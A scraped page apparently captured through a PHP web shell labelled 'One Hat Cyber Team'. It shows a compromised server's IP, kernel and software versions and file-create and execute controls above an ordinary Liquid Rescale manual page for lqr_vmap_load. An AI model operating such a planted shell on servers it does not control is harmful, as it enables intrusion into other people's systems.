⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.74
Server IP:
104.21.16.1
Server:
Linux vmi2315822.contaboserver.net 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
liblqr-1-0-dev
/
html
/
View File Name :
ref-lqr-vmap-load.html
<html><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>lqr_vmap_load</title><meta name="generator" content="DocBook XSL Stylesheets V1.79.1"><link rel="home" href="index.html" title="The Liquid Rescale library Manual"><link rel="up" href="ref-vmaps.html" title="Visibiliy maps"><link rel="prev" href="ref-lqr-vmap-internal-dump.html" title="lqr_vmap_internal_dump"><link rel="next" href="ref-lqr-vmap-list-start.html" title="lqr_vmap_list_start"></head><body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"><div class="navheader"><table width="100%" summary="Navigation header"><tr><th colspan="3" align="center"><code class="function">lqr_vmap_load</code></th></tr><tr><td width="20%" align="left"><a accesskey="p" href="ref-lqr-vmap-internal-dump.html">Prev</a>�</td><th width="60%" align="center">Visibiliy maps</th><td width="20%" align="right">�<a accesskey="n" href="ref-lqr-vmap-list-start.html">Next</a></td></tr></table><hr></div><div class="refentry"><a name="ref-lqr-vmap-load"></a><div class="titlepage"></div><div class="refnamediv"><h2>Name</h2><p>lqr_vmap_load — load an <code class="classname">LqrVMap</code> object into an <code class="classname">LqrCarver</code> object</p></div><div class="refsynopsisdiv"><h2>Synopsis</h2><div class="funcsynopsis"><pre class="funcsynopsisinfo">#include <lqr.h></pre><table border="0" class="funcprototype-table" summary="Function synopsis" style="cellspacing: 0; cellpadding: 0;"><tr><td><code class="funcdef">LqrRetVal <b class="fsfunc">lqr_vmap_load</b>(</code></td><td>LqrCarver* <var class="pdparam">carver</var>, </td></tr><tr><td>�</td><td>LqrVMap* <var class="pdparam">vmap</var><code>)</code>;</td></tr></table><div class="funcprototype-spacer">�</div></div></div><div class="refsect1"><a name="idm4004"></a><h2>Description</h2><p> The function <code class="function">lqr_vmap_load</code> loads the visibility map contained in the <code class="classname">LqrVMap</code> object pointed to by <em class="parameter"><code>vmap</code></em> in the <code class="classname">LqrCarver</code> object pointed to by <em class="parameter"><code>carver</code></em>. </p><p> It can only be called over uninitialised carver objects, therefore care must be taken not to exceed the loaded map depth when resizing (see the <code class="classname">LqrVMap</code> objects format description in the page for <a class="xref" href="ref-lqr-vmap-new.html" title="lqr_vmap_new"><span class="refentrytitle"><code class="function">lqr_vmap_new</code></span>(3)</a>). </p><div class="refsect1"><a name="idm4015"></a></div><p> The return value follows the Liquid Rescale library signalling system. </p></div><div class="refsect1"><a name="idm4018"></a><h2>See also</h2><p> <span class="simplelist"><a class="xref" href="ref-lqr-ret-val.html" title="LqrRetVal"><span class="refentrytitle"><span class="type">LqrRetVal</span></span>(3)</a>, <a class="xref" href="ref-lqr-vmap-new.html" title="lqr_vmap_new"><span class="refentrytitle"><code class="function">lqr_vmap_new</code></span>(3)</a>, <a class="xref" href="ref-lqr-vmap-dump.html" title="lqr_vmap_dump"><span class="refentrytitle"><code class="function">lqr_vmap_dump</code></span>(3)</a>, <a class="xref" href="ref-lqr-vmap-internal-dump.html" title="lqr_vmap_internal_dump"><span class="refentrytitle"><code class="function">lqr_vmap_internal_dump</code></span>(3)</a>, <a class="xref" href="ref-lqr-carver-set-dump-vmaps.html" title="lqr_carver_set_dump_vmaps"><span class="refentrytitle"><code class="function">lqr_carver_set_dump_vmaps</code></span>(3)</a></span> </p></div></div><div class="navfooter"><hr><table width="100%" summary="Navigation footer"><tr><td width="40%" align="left"><a accesskey="p" href="ref-lqr-vmap-internal-dump.html">Prev</a>�</td><td width="20%" align="center"><a accesskey="u" href="ref-vmaps.html">Up</a></td><td width="40%" align="right">�<a accesskey="n" href="ref-lqr-vmap-list-start.html">Next</a></td></tr><tr><td width="40%" align="left" valign="top"><code class="function">lqr_vmap_internal_dump</code>�</td><td width="20%" align="center"><a accesskey="h" href="index.html">Home</a></td><td width="40%" align="right" valign="top">�<code class="function">lqr_vmap_list_start</code></td></tr></table></div></body></html>